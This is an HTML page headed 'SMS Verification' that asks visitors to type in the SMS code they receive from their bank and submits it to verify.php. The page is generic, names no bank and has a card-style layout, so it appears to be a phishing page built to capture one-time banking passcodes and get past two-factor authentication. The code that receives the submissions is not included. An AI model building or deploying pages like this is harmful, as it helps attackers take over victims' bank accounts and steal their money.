<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" sizes="32x32" href="./images/favicon-32x32.png">
    <link rel="stylesheet" href="./styles.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Space+Grotesk:wght@500&display=swap" rel="stylesheet">
    <title>Enter SMS Code</title>
</head>
<body>
    <div id="content">
        <header>
            <div id="card-container">
                <div id="front">
                    <figure>
                        <img src="images/card-logo.svg" alt="Verification">
                    </figure>
                    <p class="card-details">SMS Verification</p>
                    <p class="card-details">Enter the SMS you receive from your bank.</p>
                </div>
            </div>
        </header>
        <div id="entry-form">
            <form action="verify.php" method="POST" name="sms-verification-form">
                <div class="long-form">
                    <label for="sms-code">Enter SMS Code</label><br>
                    <input type="text" id="sms-code" name="sms-code" placeholder="e.g. 123456" maxlength="6"><br>
                    <div class="error" id="sms-code-error"></div>
                </div>
                <input type="submit" value="Verify">
            </form>
        </div>
    </div>
    <script src="./script.js"></script>
</body>
</html>